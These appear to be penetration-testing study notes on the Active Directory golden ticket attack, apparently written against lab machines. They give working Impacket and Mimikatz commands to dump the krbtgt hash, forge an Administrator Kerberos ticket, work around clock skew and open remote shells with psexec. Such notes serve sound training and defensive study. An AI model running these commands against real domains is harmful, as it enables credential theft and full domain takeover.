// notes/ Active Directory
🏛️

Post Domain Compromise Golden Ticket Attack

When we compromise the krbtgt account, we will own the domain and be able to grant tickets however we want to. This allows us complete access to every machine in the domain.

#active directory#adot8
source · oscp.adot8.com · active-directory/post-domain-compromise_golden-ticket-attack

Golden Ticket Attack

Overview

When we compromise the krbtgt account, we will own the domain and be able to grant tickets however we want to. This allows us complete access to every machine in the domain.

We can use Mimikatz on the Domain Controller to pull this attack off

Golden Ticket Attack via Ticketer

First get domain sid (inside of DC shell)

code
01impacket-lookupsid pnpt.local/adot:'texas'@192.168.1.10
<figure><img src="/files/XNne0mzqNtSXazSDUBEz" alt=""><figcaption></figcaption></figure>

impacket-ticketer -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

bash
$impacket-ticketer -nthash '819af826bb148e603acb0f33d17632f8' -domain-sid S-1-5-21-3072663084-364016917-1341370565 -domain htb.local Administrator
<figure><img src="/files/QRmivC10dWuGLKPmbsxo" alt=""><figcaption></figcaption></figure>
bash
$export KRB5CCNAME=Administrator.ccache

Add the domain, hostnames etc to /etc/hosts file

<figure><img src="/files/AJT2QhpXsvAgmYa15BT9" alt=""><figcaption></figcaption></figure>
bash
$impacket-psexec htb.local/administrator@forest -k -no-pass

{% hint style="info" %} You might have to change time for Kerberos to accept it {% endhint %}

<figure><img src="/files/qi96UyfpTUZxeYF7WCvN" alt=""><figcaption><p>From nmap scan</p></figcaption></figure> <figure><img src="/files/pjvhExo3udeuCKAIhHur" alt=""><figcaption></figcaption></figure> <pre class="language-bash"><code class="lang-bash"><strong>sudo for i in $(seq 00 24); do sudo date -s $i:36:00; impacket-psexec htb.local/threebigguys@10.10.10.161 -k -no-pass; done </strong></code></pre>
bash
$sudo date -s 21:36:00

Resource

Golden Ticket Attack via Mimikatz

In the Domain Controller shell

powerquery
01mimikatz.exe
02privilege::debug
03sekurlsa::lsa /inject /name:krbtgt
<figure><img src="/files/sxabvVaxHS85hvfcKjIK" alt=""><figcaption><p>Note down the SID and NTLM hash of krbtgt account</p></figcaption></figure>
powerquery
01kerberos::golden /user:Administrator /domain:PNPT.local /sid:5-1-5-21--XXX /krbtgt:11f843XXX /id:500 /ptt
code
01misc::cmd
02psexec \\DESKTOP-ILG11 cmd.exe